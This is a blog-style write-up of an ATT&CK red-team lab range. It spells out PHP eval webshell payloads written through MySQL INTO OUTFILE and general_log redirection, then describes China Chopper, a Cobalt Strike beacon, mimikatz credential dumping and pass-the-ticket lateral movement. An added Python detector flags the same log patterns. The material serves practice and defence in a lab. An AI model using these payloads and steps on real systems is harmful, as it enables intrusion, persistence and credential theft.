SongShuA

A person with dreams in their heart and the ability to control their own destiny, who is a creative professional in the field of cybersecurity.

ATT&CK Practical Series - Red Team Assessment (Part 1) Range Notes

Range Connection

Overview:

Virtual machine password: hongrisec@2019 (a password reset is required after the first login)

win7
192.168.0.1/24 (bridged, external-facing)
192.168.52.0/24 (internal network)

win2003
192.168.52.0/24 (internal network)

win2008
192.168.52.0/24 (internal network)

Range Deployment

Start the win2008 DC host first
Then start win2003
Finally start win7
Start phpstudy on the C drive of the win7 host (the bundled copy is damaged and will not start; install phpstudy separately and migrate the files under WWW, except phpmyadmin)


Main Content

Scan the external web server first and check port 80. The port scan (done here with Yujian) lists the open ports and shows that a PHP probe page is present.

Scanning and brute-forcing directories shows that directory listing is enabled (possibly caused by the freshly installed phpstudy). This exposes the sensitive files beifen.rar and the phpmyadmin login page.

Downloading and extracting the backup yields source code. Building the URL from the source folder's name leads to a broken CMS, which does not seem to be useful.

Reading the source again reveals the database password.
This is the root account for the database, and it also logs in to phpmyadmin.
First, try to write a webshell; the web root path is known from the probe page.

select "<?php @eval($_POST[a]);?>" into outfile "C:/WWW/11.php";

The write fails: file output from the database is restricted.

Try the general query log instead

set global general_log='on'; # enable the general query log
set global general_log_file='D:/WWW/xxx.php'; # set the log file path to a location under the web root

Finally, run a query whose text is the payload, so that the query is written into the log file

select '<?php @eval($_POST[a]);?>';
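As an added example from the defender's side (not part of the original post), the script below scans MySQL general-log lines for the two write patterns shown above: a SELECT ... INTO OUTFILE aimed at a script file under a web root, and a SET GLOBAL general_log_file that points the log into the web root, followed by a query carrying a PHP tag. The log lines are constructed for this example (laid out like the MySQL 5.7/8.0 general log: timestamp, thread id, command, argument), and the web-root path fragments in WEB_ROOT_HINTS are an assumption to adapt per host.

```python
"""Flag MySQL general-log entries that look like a database account being used
to write PHP into the web root: SELECT ... INTO OUTFILE to a script path, or
general_log_file redirected into the web root plus a logged query with a PHP tag.
Sample log lines are constructed for this example.
"""
import re
from dataclasses import dataclass

# Path fragments treated as "inside a web root" (assumption; extend for your hosts).
WEB_ROOT_HINTS = ("/www/", "/htdocs/", "/wwwroot/", "/html/")
SCRIPT_EXT = re.compile(r"\.(php[3-7]?|phtml|jsp|aspx?)\b", re.I)
PHP_TAG = re.compile(r"<\?(php|=)?", re.I)
EVAL_INPUT = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)
INTO_OUTFILE = re.compile(r"\binto\s+(outfile|dumpfile)\s+['\"]([^'\"]+)['\"]", re.I)
SET_LOG_FILE = re.compile(r"\bset\s+(global\s+)?general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)
SET_LOG_ON = re.compile(r"\bset\s+(global\s+)?general_log\s*=\s*['\"]?(on|1)['\"]?", re.I)
# General-log layout: <timestamp> <thread id> <Command> <argument>
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Constructed sample log: the sequence of statements from the write attempts above,
# surrounded by ordinary traffic.
SAMPLE_LOG = "\n".join([
    "2019-10-01T08:00:01.000000Z\t    7 Connect\troot@localhost on",
    "2019-10-01T08:00:02.000000Z\t    7 Query\tselect version()",
    '2019-10-01T08:00:03.000000Z\t    7 Query\tselect "<?php @eval($_POST[a]);?>" into outfile "C:/WWW/11.php"',
    "2019-10-01T08:00:04.000000Z\t    7 Query\tset global general_log='on'",
    "2019-10-01T08:00:05.000000Z\t    7 Query\tset global general_log_file='D:/WWW/xxx.php'",
    "2019-10-01T08:00:06.000000Z\t    7 Query\tselect '<?php @eval($_POST[a]);?>'",
    "2019-10-01T08:00:07.000000Z\t    7 Query\tselect id from users where id = 1",
])


@dataclass
class Finding:
    line_no: int
    rule: str
    statement: str


def is_web_root_script(path: str) -> bool:
    """True when the path has a server-side script extension and sits under a web-root-like directory."""
    p = path.replace("\\", "/").lower()
    return bool(SCRIPT_EXT.search(p)) and any(h in p for h in WEB_ROOT_HINTS)


def inspect_query(sql: str) -> list:
    """Return the names of the rules one SQL statement triggers (empty list if none)."""
    hits = []
    m = INTO_OUTFILE.search(sql)
    if m and is_web_root_script(m.group(2)):
        hits.append("outfile_to_webroot")
    m = SET_LOG_FILE.search(sql)
    if m and is_web_root_script(m.group(2)):
        hits.append("general_log_redirected_to_webroot")
    if SET_LOG_ON.search(sql):
        hits.append("general_log_toggled")  # low signal alone; meaningful next to a redirect
    if PHP_TAG.search(sql):
        hits.append("php_tag_in_query")
    if EVAL_INPUT.search(sql):
        hits.append("eval_of_request_input")
    return hits


def scan_general_log(lines) -> list:
    """Parse general-log lines and collect a Finding for every rule each Query entry triggers."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue  # Connect/Quit/Init DB entries carry no statement text
        stmt = m.group("arg")
        for rule in inspect_query(stmt):
            findings.append(Finding(n, rule, stmt))
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG.splitlines()):
        print(f"line {f.line_no}: {f.rule}: {f.statement}")
```

One caveat when running this against a real server: once general_log_file has been redirected, every later statement lands in the new file, so the SET GLOBAL statement itself is the indicator to hunt for in the original log. On the prevention side, the usual MySQL controls are secure_file_priv (restricting or disabling INTO OUTFILE), not granting the FILE privilege to application accounts, and running mysqld as a user that cannot write to the web root at all, so that neither trick can produce a reachable script.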

Then connect with a webshell client (AntSword was tried first, but it could not connect for unknown reasons).
Use the webshell to write a China Chopper shell for later use, and check the current privileges with China Chopper.

Use China Chopper to launch an msf shell.

The msf session cannot be upgraded to a shell; it keeps terminating abnormally, presumably because of antivirus software or a firewall.

Falling back to the old method: use the webshell to upload a payload, and let the virtual terminal wait for the Cobalt Strike beacon to check in.
First, spawn a few extra sessions for myself so that the session is not lost.

There is not much to say after this. I originally thought I could do something fancy with this range, but I ended up with administrator privileges on the machine, and the services on the remaining two hosts crashed, so I did not do much. Still using the old method, first read passwords from memory with mimikatz.
Following the network topology, win2003 should be compromised first, and then win2008 through the domain. Pass the ticket to 2003, read the password there, obtain the domain admin account, and move on to 2008. For machines without internet access, an SMB beacon should be used. Pay attention to the network segment of the attacking session.
